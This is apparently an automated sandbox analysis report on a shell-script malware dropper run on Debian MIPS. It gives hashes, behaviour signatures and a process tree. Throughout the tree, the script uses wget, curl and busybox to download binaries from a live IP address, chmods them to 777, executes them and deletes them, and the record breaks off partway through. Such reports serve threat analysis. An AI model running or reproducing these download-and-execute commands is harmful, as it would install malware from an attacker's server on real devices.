Analysis
-
max time kernel
87s -
max time network
89s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
-
Size
10KB
-
MD5
28e68f4a8e17f58eb03239953a34f7e6
-
SHA1
ab686c91da287340dad814683646a6b42978b168
-
SHA256
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f
-
SHA512
ad6c64228000359844d7cbf7134a85387cef19f1f8d10ee5fb2c649958583cabe83458cc1a0785876804db6f37239ce2a7548eca8ad5c6aca61903a7de19b09f
-
SSDEEP
192:W0H2erUorJWr9dhjRxANRbqck7YcxQE/gYXYMpAAd5MUbYsyck7YcvQE/gYRYMp9:W0H2erUorEr9dkQYMpAAd5MUbYsMYMp9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 895 chmod 919 chmod 853 chmod 889 chmod 838 chmod 859 chmod 877 chmod 901 chmod 973 chmod 783 chmod 931 chmod 949 chmod 979 chmod 844 chmod 913 chmod 967 chmod 796 chmod 937 chmod 865 chmod 808 chmod 871 chmod 883 chmod 907 chmod 943 chmod 739 chmod 955 chmod 961 chmod 925 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 740 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS 784 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE 797 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX 810 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk 839 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p 845 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 854 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd 860 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk 866 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc 872 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc /tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG 878 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG /tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe 884 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe /tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 890 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 /tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP 896 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk 902 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc 908 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc /tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG 914 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG /tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe 920 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe /tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 926 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 /tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP 932 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS 938 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE 944 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX 950 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk 956 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 962 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p 968 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 974 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd 980 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 20 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 876 busybox 878 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG 879 rm 962 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 963 rm 714 wget 740 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 910 wget 958 wget 959 curl 738 busybox 741 rm 874 wget 875 curl 911 curl 912 busybox 915 rm 960 busybox 737 curl 914 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP curl File opened for modification /tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG curl File opened for modification /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE curl File opened for modification /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 curl File opened for modification /tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 curl File opened for modification /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX curl File opened for modification /tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe curl File opened for modification /tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe curl File opened for modification /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS curl File opened for modification /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN curl File opened for modification /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk curl File opened for modification /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk curl File opened for modification /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE curl File opened for modification /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk curl File opened for modification /tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 curl File opened for modification /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX curl File opened for modification /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p curl File opened for modification /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk curl File opened for modification /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc curl File opened for modification /tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP curl File opened for modification /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd curl File opened for modification /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS curl File opened for modification /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd curl File opened for modification /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc curl File opened for modification /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p curl File opened for modification /tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG curl File opened for modification /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN curl File opened for modification /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 curl
Processes
-
/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:714
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:738
-
-
/bin/chmodchmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:740
-
-
/bin/rmrm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:776
-
-
/bin/chmodchmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:787
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:789
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:795
-
-
/bin/chmodchmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:803
-
-
/bin/chmodchmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:837
-
-
/bin/chmodchmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:843
-
-
/bin/chmodchmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:852
-
-
/bin/chmodchmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:858
-
-
/bin/chmodchmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:864
-
-
/bin/chmodchmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:870
-
-
/bin/chmodchmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG./fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:878
-
-
/bin/rmrm fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:882
-
-
/bin/chmodchmod 777 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe./Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:888
-
-
/bin/chmodchmod 777 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8./DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:894
-
-
/bin/chmodchmod 777 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP./eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:900
-
-
/bin/chmodchmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:906
-
-
/bin/chmodchmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG./fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:914
-
-
/bin/rmrm fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:918
-
-
/bin/chmodchmod 777 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe./Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:924
-
-
/bin/chmodchmod 777 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8./DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:930
-
-
/bin/chmodchmod 777 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP./eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Executes dropped EXE
PID:932
-
-
